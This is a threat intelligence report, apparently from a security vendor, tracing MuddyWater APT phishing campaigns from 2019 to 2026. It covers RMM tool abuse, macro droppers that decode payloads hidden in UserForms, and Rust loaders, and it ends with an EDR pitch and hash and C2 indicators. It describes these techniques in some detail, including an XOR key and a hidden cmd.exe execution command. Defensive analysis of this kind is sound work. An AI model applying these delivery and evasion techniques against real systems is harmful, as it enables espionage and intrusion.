Chronology of MuddyWater APT Attacks Targeting the Middle East

TL;DR

◈ Key Findings

• The Middle East serves as a strategic cyber threat hub where state-sponsored APT activities are highly concentrated.
• Attacks originating from the Middle East prioritized long-term infiltration and intelligence collection over short-term gains.
• Abuse of RMM tools and macro-based attacks were primary initial access vectors used by Middle Eastern APT groups.
• User-driven attacks leveraging social engineering techniques and outdated environments continued to be actively employed.
• Perimeter-based detection has clear limitations, making endpoint behavior-based EDR essential.

1. Overview

The Middle East is a region of high strategic importance from geopolitical, military, and energy security perspectives, where a significant volume of state-sponsored cyber threat activities has been observed. Due to these characteristics, persistent intrusion-focused cyber operations (APT) conducted for state-level intelligence collection and the execution of diplomatic and security strategies have been actively carried out. These activities have not been confined to the Middle East, but have shown a pattern of expansion across Europe, Asia, and North America.

Cybersecurity threats originating from the Middle East have been analyzed as prioritizing long-term persistence, information theft, and influence expansion over one-off attacks or direct financial gain. Attack targets are primarily concentrated in sectors critical to national functions, such as government agencies, diplomatic and defense organizations, and energy and telecommunications infrastructure.

Cybersecurity authorities in multiple countries, including the United States and the United Kingdom, have highlighted that Middle East-based threat actors continued to rely on document-based spear-phishing as an initial access method.

Recent versions of Microsoft Office block macro execution by default for documents downloaded from the internet or apply enhanced security protections. However, attackers combined email content with social engineering techniques to persuade users to explicitly enable macros. In environments where legacy software remained widely deployed, automatic macro execution was still enabled, resulting in a relatively high success rate.

In addition, document-based threats that abuse OLE and embedded object features to conceal payloads remain a commonly used attack vector worldwide. When such environments are combined with well-crafted phishing messages, document-based initial access techniques that rely on user interaction continue to be considered an effective attack method.

Against this backdrop, this threat intelligence report aims to analyze the current landscape of state-sponsored cyber threats operating primarily in the Middle East and to systematically outline the key tactics and technical characteristics observed in real-world attacks.

This report aims to provide an objective view of the current landscape of Middle East–based cyber threats by focusing on recently observed attack flows, including spear-phishing–based initial access, user deception through malicious documents, and post-compromise techniques for persistence and evasion.

In such a threat environment, traditional perimeter security and signature-based detection approaches are assessed as having inherent limitations in effectively identifying and blocking attacks across their full lifecycle. Accordingly, this report also examines the necessity of adopting Endpoint Detection and Response (EDR) from the perspective of behavior-based detection and post-compromise visibility.

EDR is recognized as an effective countermeasure for continuously collecting and analyzing anomalous endpoint behaviors. It enables the detection of techniques repeatedly leveraged in Middle East–based APT attacks following initial compromise, such as lateral movement, script execution, and memory-based malicious activity.

Ultimately, this report aims to enhance understanding of the tactics and technical evolution of Middle East cyber threats and, based on this analysis, to derive practical technical and operational insights for strengthening organizational detection and response capabilities.

2. Background

State-sponsored cyber threat groups operating in the Middle East are generally known to have structural ties to intelligence agencies or quasi-governmental organizations. While these groups outwardly present themselves as independent hacking collectives, numerous cases have confirmed that they are in fact leveraged as operational entities for intelligence collection and the execution of cyber operations aligned with national strategic objectives.

The names used to refer to threat groups within the international security community are typically not official designations adopted by the actors themselves. Instead, they commonly originate from classification labels assigned by security analysts based on factors observed during initial compromise analysis, including attack infrastructure, malicious tools, campaign characteristics, and internal identifiers. These names serve as practical identifiers for systematically distinguishing and analyzing threat actor activities.

The designation "MuddyWater" was first used in November 2017 in the Palo Alto Networks Unit 42 report titled "Muddying the Water: Targeted Attacks in the Middle East," during the process of identifying and classifying a series of targeted attacks against the Middle East.

Since then, the name was widely adopted by multiple security vendors and national cybersecurity authorities in threat intelligence (TI) analysis reports as the term used to refer to the same threat actor.

Based on technical analysis findings, the threat actor is assessed to be affiliated with Iran’s Ministry of Intelligence and Security (MOIS). This assessment cited multiple factors, including the geographic and political characteristics of the targets, attack infrastructure repeatedly reused over extended periods, operational patterns concentrated within specific time windows, and tactics, techniques, and procedures (TTPs) that overlapped with Iran-based threat actors. This assessment is not based on a single indicator but is derived from a comprehensive synthesis of multi-year campaign tracking and infrastructure correlation analysis.

The name "Muddy Water" can be interpreted as a symbolic reference to operational characteristics intended to deliberately obscure the attack chain and attribution. However, such labels are convenience identifiers for analysis and classification. The substantive nature of the threat lay not in a specific group name, but in persistent, systematic, state-directed cyber operational capabilities and operating methods.

Looking at the overall attack patterns of Middle East–origin cyber threats, spear-phishing emails were most frequently used during the initial access stage. In this process, malicious files delivered via Office documents, including Microsoft Word documents, had been used as a primary delivery mechanism since the initial reporting in 2017, and were observed to be used alongside various formats such as Excel macro-enabled documents.

These documents were typically disguised as legitimate business materials or official notices to prompt users to enable content or run macros, which then installed additional malicious payloads.

Post-compromise, threat actors employed a range of tactics, techniques, and procedures (TTPs), including PowerShell-based script execution, DLL side-loading, and the abuse of legitimate remote management tools. These techniques enabled long-term access persistence within the network and evasion of security detection.

In addition, some recent attack cases showed indications of malware written in Rust, suggesting that state-sponsored threat actors in the Middle East continued to advance their malware development and operational capabilities.

Putting these observations together, Middle East cyber threats should be understood not as an issue limited to a single group or isolated campaign, but as a threat ecosystem accumulated and operated over the long term at the level of national strategy. Accordingly, rather than responding on a case-by-case basis, organizations need to analyze threats around commonalities in attack methods and the direction of technical evolution, and to establish proactive detection and response strategies based on those insights.

3. Chronology of MuddyWater APT Attacks

3-1. Case: Attack on Iraqi Telecommunications Infrastructure

To more accurately understand recent threat trends, it is necessary to first review past APT attack cases conducted against telecommunications providers in the Middle East. Reviewing these prior cases provides important background for understanding the strategic objectives pursued by threat actors over an extended period and the evolution of their tactical approaches.

A notable example is a targeted attack against an Iraqi mobile network operator, detected on March 11, 2019. The attack targeted an operator running major telecommunications infrastructure in Iraq and was assessed as aiming to maintain long-term intrusion after obtaining initial access to the internal user environment.

[Figure 3-1] Spear-Phishing Attack Case Targeting an Iraqi Mobile Network Operator

The operator provided mobile telecommunications services across Iraq and had a diverse user base, including enterprises, government agencies, and individual customers. Although its business structure and service coverage later changed due to financial and regulatory issues, at the time it was regarded as one of the key operators supporting the national telecommunications backbone. These attributes made it a high-value strategic target for external threat actors.

In the initial stage of the attack, a typical spear-phishing–based intrusion technique was used. Analysis indicated that the threat actor emailed a Microsoft Word file disguised as a work-related document to a specific internal user, prompting the recipient to open the document and enable macro execution. In this process, the lure document inserted a blurred image to trick the user into activating macros, and after the macro executed, it displayed a fake error message, which was designed to minimize user suspicion.

[Figure 3-2] Prompt to Enable Malicious Macros in a DOC Document

The malicious macro embedded in the document, immediately upon execution, invoked additional malicious logic and performed deobfuscation. In the final stage, it was structured to launch a backdoor via PowerShell.

This PowerShell-based backdoor communicated with a C2 server and provided capabilities such as remote command execution, additional payload download, and control of the infected system, enabling the attacker to maintain persistent control over the internal environment. This attack flow showed characteristics consistent with the tactics, techniques, and procedures (TTPs) repeatedly used by the threat actor. In particular, the use of PowerShell masquerading as a legitimate administrative tool served as an effective means of evading detection and establishing a stealthy, long-term foothold.

This case was not limited to a single, isolated attack against one telecommunications operator, but served as an important reference for understanding a broader series of activities that persistently targeted telecommunications, energy, and government-related organizations across the Middle East. In particular, considering the customer data, network operations data, and connections with government agencies held by telecommunications providers, these activities were likely conducted to support strategic intelligence collection and long-term influence, rather than simple information theft.

Such historical cases carried significant value as a baseline for analyzing later campaigns, enabling analysts to compare and contrast the adversary’s approach to objective setting, initial access strategy, and the end-to-end flow of malware use.

3-2. Case: Attack Targeting a University in Jordan

The second case was a sophisticated spear-phishing attack carried out on April 8, 2019, against a member of a university in Jordan. The attack targeted the university and impersonated a trusted government agency, with socially engineered initial access attempts serving as its core component.

The attacker sent an email impersonating the Jordanian government agency "Civil Status and Passport Department (cspd.gov.jo)". The email subject line was "Students Migration Verification - Civil Status and Passport Department". This was a spoofing technique intended to lead the recipient to perceive the message as an official administrative request sent by a legitimate government institution.

[Figure 3-3] Spear-Phishing Case Targeting a University in Jordan

The email body stated that, per a request from the CSPD, migration-related information for certain students needed to be verified, and asked the recipient to review the attached document and promptly inform the relevant students. This structure closely reflected the roles and responsibilities of university administrative staff and was a social engineering design intended to prompt the recipient to open the attachment without suspicion.

The attachment was a Microsoft Word document disguised as legitimate student-related content and contained malicious macro code. The document was configured to execute macros if the user enabled content, and after execution, it loaded additional malicious payloads or attempted to communicate with remote infrastructure controlled by the attacker.

In particular, the document was configured via OpenXML relationship definitions to reference an externally hosted template. It used the attachedTemplate relationship to load a template file from a remote URL controlled by the attacker. This external template was automatically loaded when the document was opened and could be used as an additional delivery path for malicious code either before or after macro execution. This is a typical document-based initial access method that leverages user action as the direct trigger and an indirect loading technique used to bypass security detection.

[Figure 3-4] Prompt to Enable Malicious Macros in a DOC Document

The VBA script embedded in the malicious document served to invoke PowerShell commands, and was designed to enable follow-on actions such as backdoor installation, collection of information from the infected system, and remote command execution. The external template invocation technique made static analysis of the document itself more difficult and, by separating the actual malicious logic into remote resources, enabled flexible replacement of attack infrastructure and modification of payloads. This attack flow combined document-based social engineering, external template loading, and script execution, and was designed with multi-stage intrusion in mind.

The attacker selected an educational institution to gain broader network access rather than simply infecting an individual user. Educational institutions such as universities often have direct or indirect ties to government departments, research organizations, and public projects, which can provide access to additional information assets and follow-on intrusion paths. Accordingly, this attack reflected a strategic focus on mid- to long-term intelligence collection and internal foothold establishment, rather than short-term malware distribution.

In addition, the attack flow observed in this case was structured to account for post-compromise persistence and potential expansion. Follow-on command execution via PowerShell, potential communication with remote control infrastructure, and the possibility of installing additional tools were assessed as characteristics designed to enable the attacker to observe and control the internal environment over an extended period.

Overall, this case is a representative example of an advanced spear-phishing attack that abused the trust of educational institution members through emails impersonating a government agency and attempted internal intrusion triggered by the execution of a malicious document. It shows that email-based attacks remained an effective initial access vector in targeted attacks, and suggests that messages disguised as administrative or official requests could have a high likelihood of success within organizations.

3-3. Case: Attacks Targeting Egypt’s Hosting Services, Israel’s Insurance, and Malaysia’s Pension Sector

The spear-phishing cases discussed earlier primarily relied on malicious MS Word documents. However, between Q4 2022 and Q2 2023, a shift in attack techniques was observed, with attackers using malicious HTML files or embedding Dropbox URLs.

The HTML file used in this attack, when opened, prompted additional user actions through an embedded URL and ultimately redirected the recipient to a Microsoft OneDrive address. The recipient was then led to download a malicious ZIP archive.

During this process, the threat actor used legitimate cloud storage services such as Dropbox and OneDrive as an intermediate delivery path to bypass security solutions and user vigilance.

This technique abused trusted service domains to evade URL reputation-based detection and to increase credibility through social engineering.

[Figure 3-5] Spear-Phishing Case Using an HTML Attachment and Embedded URL Links

In October 2022, the attacker conducted a spear-phishing attack targeting an Egypt-based data hosting and IT infrastructure service provider, disguising the email as an inquiry about hosting services. Analysis indicated that the attacker used a format similar to a legitimate customer inquiry as a social engineering technique to lower the recipient’s vigilance.

In November 2022, the attacker simultaneously targeted three Israel-based insurance companies, showing a campaign-style pattern aimed at the broader insurance industry rather than a single organization. This was assessed as an attempt to expand the scope of attacks by consecutively targeting multiple organizations within the same sector.

In April 2023, an attack targeting an individual affiliated with a Malaysian government-run public pension fund management institution was also identified.

Notably, the malicious HTML attachment used in this attack was the same file used in the November 2022 attacks against Israel’s insurance industry.

This confirmed that the threat actor reused the malicious file and conducted sustained attack activity over several months, with professionals in the insurance and pension sectors as primary targets.

[Figure 3-6] Malicious HTML Execution Screen

When the HTML file was opened, it displayed a page that looked like a download page from the official website of a major hotel chain headquartered in Tel Aviv, Israel.

However, this was not a legitimate page. Instead, it led to a link that redirected to OneDrive and ultimately prompted the download of a malicious ZIP archive named "Looking for business insurance no335080.2022-isrotel.zip".

[Figure 3-7] Downloaded ZIP Archive and the MSI File Contained Within

The file "Looking for business insurance no335080.2022-isrotel.msi" contained inside was a Syncro MSI installer.

Syncro is a legitimate RMM (Remote Monitoring and Management) based IT management platform provided by Servably, a US-based company. It is primarily used by MSPs (Managed Service Providers) and in-house IT operations teams to remotely manage IT assets within an organization.

The solution offers a trial version with few functional limitations for a certain period, and the program itself is not malicious. Syncro identifies managed endpoints through a customized MSI agent that includes a customer ID, and systems with the agent installed are centrally controlled through a web-based management console.

This enables various administrative functions, including remote command execution and status monitoring.

[Figure 3-8] Screen Showing Customer API Key and ID Values

[Figure 3-9] Internal Commands Used to Check Key Values

In particular, systems with the agent installed enabled powerful administrative capabilities, including a SYSTEM-level remote terminal, remote desktop access, full file system control, and task and service management. These capabilities were useful in legitimate operational environments, but posed a significant security risk if abused.

A key issue was that these capabilities were distributed in the form of a properly signed MSI installer file. Threat actors could exploit this by generating a legitimate Syncro agent MSI file and distributing it as an email attachment or download link in spear-phishing messages, using it as an initial access vector. If the agent was successfully installed, attackers could obtain persistent remote access without deploying additional malware.

Attackers could then use this access to conduct internal reconnaissance and proceed with follow-on actions in stages, such as deploying additional payloads, exfiltrating data, and sharing access with others. When legitimate management tools are abused in this way, the activity can blend in with normal administrative traffic, increasing the likelihood of evading detection and raising the risk of prolonged compromise.

3-4. Case: Attack Targeting a University in Israel

In April 2024, a malicious file distribution attack targeting a university in Israel was identified. A total of 27 university email accounts, believed to belong to faculty and students, were specified as recipients.

The email used in this attack was sent from an official email account of another university in Israel, rather than from the university that received the email.

The threat actor simultaneously addressed multiple individual accounts using the recipient university’s official email domain and delivered a malicious file. This indicated a targeted campaign aimed specifically at members of a particular educational institution, rather than indiscriminate distribution to an undefined audience.

[Figure 3-10] Attack Targeting a Specific University in Israel

The email attachment included an encrypted archive named "digitalform.rar", protected with the password "123456". The password was provided in the email body, prompting the recipient to extract the archive without additional verification.

Using an encrypted archive in this way is a common evasion technique aimed at bypassing email security solutions that rely on static inspection of archived contents or on detecting and blocking malicious files.

Inside the archive was a Windows Installer package named "digitalform.msi", whose digital signature listed Atera Networks.

Atera Networks is a legitimate global management software company headquartered in Israel that provides an RMM-based remote management platform for MSPs and in-house IT departments. The platform is originally used for system administration and operational efficiency.

As noted earlier, the threat actor abused legitimate IT management tools such as Syncro and Atera as initial access vectors. By distributing properly signed installer files, the attacker attempted to evade detection by security solutions and to obtain persistent remote access to target systems without executing separate malware.

This approach warranted caution because it was nearly indistinguishable from normal administrative traffic and could conceal the compromise for an extended period.

In addition to Syncro and Atera, the threat actor was also reported to have used various remote management tools in attacks, including Remote Utilities, ScreenConnect, SimpleHelp, and N-Able.

[Figure 3-11] Properties of the"digitalform.msi" File

During installation, the "digitalform.msi" installer communicated with the Atera remote management endpoint using the embedded account information and identifier (ID).

[Figure 3-12] Atera Identifier Information

Once the installation was complete, the threat actor could use Atera RMM’s legitimate features to perform various remote administration tasks on the affected system, including command execution, file upload and download, and system monitoring.

In addition, the installer could be used to set up an environment capable of launching third-party remote control tools, as listed below. 

• Splashtop (Free)
• AnyDesk (Free)
• TeamViewer
• ScreenConnect

[Figure 3-13] Atera Device Management Screen

In this way, the MuddyWater APT group registered for legitimate RMM services through normal procedures and then used the agent modules provided by those platforms during the initial access stage.

Instead of distributing custom malware, they delivered properly signed RMM installer packages via phishing email attachments or download links, prompting victims to install them. The agent communicated with official RMM infrastructure and enrolled the endpoint into the remote management environment, allowing the attacker to obtain persistent remote access without executing additional payloads.

Because the network traffic and process activity generated through this method followed the same patterns as legitimate IT administration, it was effective at bypassing traditional signature-based detection. After gaining initial access, the attacker could use RMM functionality to perform follow-on actions in stages, including deploying additional tools, executing commands, collecting information, and conducting lateral movement.

This approach reduced the cost of maintaining attack infrastructure while significantly delaying detection and increasing the difficulty of analysis by disguising malicious activity as normal administrative operations.

3-5. Case: Attack Impersonating an Omani Diplomatic Institution, Targeting Multiple Foreign Ministries and International Organizations

The spear-phishing attempt identified on August 19, 2025 appeared to be a targeted phishing email that used an attachment disguised as an official event invitation from an Omani diplomatic institution.

[Figure 3-14] Attack Screen Disguised as an Event Invitation from an Omani Diplomatic Institution

The email was a mass spear-phishing message sent to hundreds of recipients, not a single organization, including foreign ministries, resident embassies, and accounts associated with UN-affiliated international organizations across Europe, the Middle East, Africa, Asia, and the Americas. The subject line was "official invitation", using a phrase commonly used in formal correspondence between diplomatic missions to lower the recipient’s vigilance.

The message omitted specific event details from the subject line and instead prompted the recipient to review the email body and attachment, a pattern repeatedly observed in spear-phishing attacks.

The sender address used the official domain of Oman’s Ministry of Foreign Affairs and used an account name suggestive of the Omani Embassy in Paris, France, designed to be perceived as a legitimate diplomatic account.

This was a social engineering technique intended to increase credibility through domain recognition and to prompt recipients to mistake the message for official diplomatic communication.

The email body was written in the form of an invitation to an international seminar hosted by Oman’s Ministry of Foreign Affairs and presented a timely international issue, such as the "Iran–Israel War", to align directly with the professional interests of diplomats and international organization staff.

The attachment was delivered as a Word document named "Online Seminar.FM.gov.om.doc". It used a file type commonly associated with diplomatic correspondence, suggesting that the attacker likely attempted initial access via macro execution or exploitation of document vulnerabilities.

When the document was opened, it first displayed a lure page disguised as a legitimate diplomatic document.

At the top of the document, a banner image featuring the Omani flag and the text "Foreign Ministry of Oman" was placed, serving as a visual element that mimicked the format of official Omani Ministry of Foreign Affairs documents.

This layout increased the document’s credibility and prompted users to review the content without suspicion.

[Figure 3-15] Malicious DOC Document When Opened

In the center of the document, the phrase "Attention! Word needs Enable Content" was displayed prominently.

This message was a social engineering prompt designed to make the user feel that enabling content (activating macros) was necessary to view the document properly.

Below it, phrases such as "Online Seminar", a specific date, and diplomatic and security-related topics tied to the Middle East situation were arranged, but the actual content was blurred so that the user could not fully read the document.

As a result, the user was led to believe that macro execution was required to view the document contents.

When the user clicked the "Enable Content" button at the top, the VBA macro embedded in the document executed immediately.

The macro was bound to the Word document’s Document_Open() event, so the execution flow started automatically as soon as macros were enabled. No additional user input or clicks were required.

For reference, the VBA macro below is a partial excerpt with unused or meaningless variables removed and does not affect the main execution logic.

[Table 3-1] Partial View of the VBA Macro

Upon macro execution, the malicious document reconstructs a malicious payload hidden within it.

Rather than embedding an executable directly in the VBA code, the document stores encoded data as a numeric string inside a TextBox control of a UserForm object (UserForm1).

The numeric string is composed of three-digit segments, where each value maps to a single ASCII byte ranging from 0 to 255.

The decoding process is handled by the dddd() function. This function reads the numeric string in three-digit chunks, converts each chunk to an integer, maps it to the corresponding ASCII character, and appends it sequentially to build the decoded string.

Through this process, the binary data of the executable is reconstructed. Once the entire string is decoded, a Windows executable (PE) is fully restored.

[Figure 3-16] Numeric String Decoding Screen

The "ManagerProc.log" file was a malicious file intended not to immediately steal information from the user system, but to identify characteristics of the compromised environment after initial access and to establish a persistent foothold through communication with a remote C2 server.

When executed, the file collects basic system information such as the username and computer name, determines whether the user has administrator privileges, encrypts the data, and sends it to the C2 server at "screenai[.]online".

This sequence of actions aligned with the typical behavior of a state-sponsored spyware loader, representing a reconnaissance stage conducted in preparation for follow-on malicious activity or the delivery of additional payloads.

3-6. Case: Attack Targeting an Israel-Based Company Providing IT Services

The final case in 2025 was confirmed to have been received at 5:13 PM on Monday, November 17, a time close to the end of a typical workday. This is assessed as a spear-phishing initial access attempt timed to exploit the period just before employees leave work, when security awareness and attention are more likely to be reduced due to end-of-day wrap-up activities.

The attacker used a Hebrew-language subject and body and a sender address using Israel’s country domain (“.co.il”), indicating that the primary targets were an Israel-based company providing IT services, security, and remote support, or users associated with such a company.

The email subject, "New company guidelines and regulations", was disguised as a notice related to internal policies and rules and included social engineering elements that emphasized authority and operational importance so that the recipient would perceive it as an official document requiring immediate review.

The email body followed a concise structure containing only minimal guidance and required the recipient to open only the attachment without external links, shortening the user’s decision-making process and naturally steering the recipient toward executing the malicious document.

[Figure 3-17] Attack Targeting an Israel-Based IT Service Provider

The threat actor provided the same malicious DOC document in two formats, as a direct attachment and as a ZIP archive, to bypass security product detection or increase the likelihood that the recipient would execute the file.

[Figure 3-18] "Webinar.doc" Execution Screen

The "Webinar.doc" document runs primarily through the Sub love_me_() routine in the ThisDocument module of its VBA project, which serves as the entry point for the macro execution chain.

It first retrieves the user profile path using Environ("USERPROFILE") and then builds the drop path as "%USERPROFILE%\Downloads\PhotoAcq.log".

The routine does not download the payload directly. Instead, it proceeds by reconstructing data hidden within the document.

The payload data is embedded as an ASCII hex string in control data within UserForm1, and the string represents a PE binary (hex-encoded). At runtime, VBA reads the hex string and calls a binary conversion routine.

The conversion routine checks whether the length of the input hex string is even, converts each two-digit hex value into one byte, and writes the resulting binary to the "PhotoAcq.log" file.

After creating the file, it immediately transitions to the execution stage, connects to WMI, and uses the Win32_Process object to launch "PhotoAcq.log" as a process.

The generated "PhotoAcq.log" file contains an icon resource associated with the US security vendor SentinelOne, and includes an internal path reference to "phoenix.pdb".

• C:\Users\win10\Desktop\phonix\phoenix\x64\Release\phoenix.pdb

[Figure 3-19] "PhotoAcq.log" File Information

When executed, the "PhotoAcq.log" malware uses loader logic to load a payload (PE) hidden in the .rdata section into memory. The .rdata section contains 1,308,672 bytes (0x13F800) of encrypted data stored contiguously, and the data is not present in plaintext but is XOR-encoded.

The malware copies this data into a dynamically allocated memory region and then performs a follow-on decryption routine.

During decryption, it iterates sequentially over the entire input buffer and applies a fixed 32-byte XOR key repeatedly to each byte. The key index is calculated using the i % 0x20 operation, ensuring that the XOR key window remains limited to 32 bytes.

The XOR key is stored as a plaintext string, and the key value used for decryption is "jfdghkjfdgklhjdfhgsfd09g9045jlkd".

After decryption completes, the restored Rust-based payload executes in memory. Rust is a systems programming language that emphasizes memory safety while compiling to native code. After that, the malware carries out its final malicious actions.

[Figure 3-20] Analysis of the Payload Hidden in "PhotoAcq.log"

The payload checks for the presence of installation conditions for a total of 28 security products, including Cylance, SentinelOne, VMware Carbon Black, and CrowdStrike Falcon.

[Figure 3-21] Security Product List 

The list of anti-malware vendors enumerated by this malware is as follows:

[Table 3-2] Anti-Malware Program List

When executed, the malware operates in a specific sequence: it verifies the user account using whoami.exe, gathers system identification information via hostname.exe, and finally assesses network status and connectivity through nslookup.exe.

It also creates an SSPI (Security Support Provider Interface) based TLS security context and passes the C2 server domain during the InitializeSecurityContextW call sequence.

• stratioai[.]org (159.198.68[.]25) [US]
  
  

It then establishes an encrypted HTTPS session through the TLS handshake and performs C2 communications. During this process, system information or user-related data can be transmitted externally, which can lead to personal data exposure and additional threats.

Although the domain is encrypted on the network, it exists in plaintext in memory during the TLS initialization stage.

[Figure 3-22] C2 Domain Analysis

4. Analysis of Recent Attack Cases in 2026

4-1. Case: Attack Disguised as Cybersecurity Guidelines

The spear-phishing attack carried out on January 5, 2026 was distributed using a sender address associated with a domain used by a state-owned mobile network operator in Turkmenistan.

[Figure 4-1] Attack Disguised as Cybersecurity Guidelines

The threat actor impersonated a state-backed telecommunications provider in Central Asia to increase the sender’s credibility and prompt recipients to mistake the message for a legitimate notice from a public-sector or telecommunications infrastructure related organization.
The email subject line was "New Cybersecurity Guidelines." This is analyzed as a social engineering tactic designed to frame the message as a recent security policy update or the distribution of new guidelines, thereby exploiting the recipient's sense of professional relevance and urgency.

The email body used a brief line such as “Please refer to the attached document for details,” prompting recipients to open the attachment without fully verifying the sender or the document’s legitimacy.

The attached MS Word document, "Cybersecurity.doc", was a malicious file disguised as a legitimate security-related document and displayed a lure screen designed to prompt macro execution.

[Figure 4-2] "Cybersecurity.doc" Execution Screen

The VBA macro embedded in the MS Word document was configured to run automatically when the document was opened and acted as a dropper that created and executed a malicious payload. It operated through the Document_Open event, triggering the malicious logic immediately upon opening the document without additional user actions.

First, the macro read hex-encoded data stored in a text box within a UserForm that was not visible to the user, converted it into binary data, and wrote it to a file at "C:\ProgramData\CertificationKit.ini".

Because the actual payload was hidden within the form object rather than in the main VBA code body, the document was structured to make it difficult to identify the malicious behavior through static analysis. The macro then created a WScript.Shell COM object using a string obfuscation technique and used it to set up an external command execution environment.

The execution command was also constructed by combining numeric arrays with character conversion functions. It ultimately invoked the command "cmd.exe /c CertificationKit.ini" to run the file. The command was configured to run without displaying a console window, making it difficult for the user to notice the execution.

The "Cybersecurity.doc" document showed a highly similar structure and execution flow to the "Webinar.doc" malicious document previously observed in the attack case targeting an Israel-based IT service provider.

The generated "CertificationKit.ini" file was a 64-bit EXE executable and used a Cloudflare icon. Its original filename was set to "reddit.exe", and it was built in Rust, consistent with earlier samples.

• nomercys.it[.]com (159.198.66[.]153) [US]

[Figure 4-3] C2 Analysis of the Rust-Based Payload

The C2 server used the domain "nomercys.it[.]com". It collected information such as installed security products from infected systems and served as a communication channel for delivering additional commands or payloads.

Based on these findings, the MuddyWater APT group continues to employ tactics that use DOC file-based VBA macros as an initial intrusion vector, while leveraging Rust-based malicious payloads to conduct reconnaissance and information gathering on compromised systems.

5. Conclusion

5-1. Attack Patterns and Threat Assessment

The MuddyWater APT group operates primarily across the Middle East, conducting long-term, campaign-style attacks against various industries. They are assessed as a strategic threat whose core objectives are long-term infiltration and intelligence gathering rather than short-term disruption.

Even as their targets and timing shift, their attacks maintain tactical consistency by exploiting legitimate business environments and user trust.

5-2. Key Attack Techniques and Limitations

The threat actor abuses legitimate RMM remote administration tools and uses VBA macros in MS Word documents as an initial access method.

Recent activity has also shown the use of Rust-based malicious executables as payloads.

5-3. Necessity of an EDR-Centered Response Strategy

Accordingly, responding to MuddyWater APT requires moving beyond isolated defenses limited to email or document security. Organizations need to strengthen EDR-based endpoint behavioral detection as a core pillar of their security posture to identify post-document execution activity flows and the abnormal use of legitimate tools.

Genian Insights E, Genians’ integrated endpoint security platform, immediately identifies and alerts on anomalous behavior through endpoint behavior-based detection (EDR).

EDR monitors abnormal executable creation and drop behavior on endpoints following VBA macro execution and detects suspicious activity based on the relationship between the document process ("WINWORD.EXE") and the generated executable ("CertificationKit.ini").

[Figure 5-1] XBA Detection View of Anomalous Behavior in the Document Process

It also provides endpoint-level visibility into post-compromise network connection attempts to external C2 servers, including abnormal destinations and periodic communication patterns.

[Figure 5-2] Network Communication View of Files Created by Office

In addition, it distinguishes and detects cmd.exe based command execution, system information collection, and environment enumeration used during the reconnaissance stage from normal user activity, enabling correlation analysis across the full attack sequence.

[Figure 5-3] Detection View of Anomalous System Information Collection Attempts

Without endpoint-level, behavior-based visibility and correlation analysis capabilities, identifying MuddyWater APT attacks at an early stage is practically difficult.

Post-document execution activities such as file creation, process execution, command execution, and network communication may appear legitimate when viewed in isolation. From the perspective of attack progression, however, they show clear relationships and recur in a staged manner.

For these reasons, EDR serves as a core security capability by analyzing not just individual events but the overall behavioral flow on the endpoint and relationships between processes. This enables early identification of the full attack chain, from document-based initial access through internal reconnaissance and external communications, and supports response before the compromise spreads.

6. IoC (Indicator of Compromise)

• MD5

806adc79e7ea3be50ef1d3974a16b7fb

0873ce3db84b79da935f71df3d6c8e6d

4055d8b5c2e909f5db8b75a5750a7005

68352f61da6e3236c4fe760997a981ea

75060f5394b72421c0d8f81f79931aa9

242098c3e87822bffa7c337987065fbe

809334c0b55009c5a50f37e4eec63c43

aaa9db79b5d6ba319e24e6180a7935d6

aba760ec55fdeccb35adb068443feb89

b9a67ffb81420e68f9e5607cc200604a

b181ecbb7394e3b1394a8c97af65b7e2

c5c0829df294cc4fd701df5d5c55718f

c381c2cb8fdd6acf1636280b9424f573

c478e472f6223e7ee92cff8b459e55e2

c89671f994af65677aa48b699a01fe9d

cdeb7abfc7775c63745135431272dda3

e2d6031afd81bf3b6a44de4d0b039055

ef6ec560efd05d21976a6fd3f489e206

f1c935ce028022ab2a495eae83adacc6

f06e30dee8629e951cefa73373fdef9d

f6a4c531e92cbdd5ffac75c76939d7f3

f97650ede0c39a29b0b5c5472f685d11

0a95918fd6000a69b8a70609f93e910f

1e9a4e774b61acc8a6b35ee50417e661

1f280f51eeb6cf895fe80082ce725841

2ed6ebaa28a9bfccc59c6e89a8990631

3a95186019af1943a0ea0f8eb07a288f

3ab16bd1c339fd0727be650104b74dd1

4c169dde3bc184c42ca7a712a61c6f3c

6d7ce5b03fe61683229c29a859505163

7da3d206519086f2725494b3ab095fbb

23d99f912f2491749b89e4fd337273bc

43be8a405a7f57cf9f910d829c521b21

64fc017a451ef273dcacdf6c099031f3

74e75830252220cbbe7e3adec4340d2d

93be13bbcad30440a0d0ef3868d67003

95d9e6c262632abe004c4693a71eaced

96d5a7e0e75654c444cb1a915c666ac8

244a4f81cff4a8dc5872628a40713735

• C2

stratioai[.]org

159.198.68[.]25

nomercys.it[.]com

159.198.66[.]153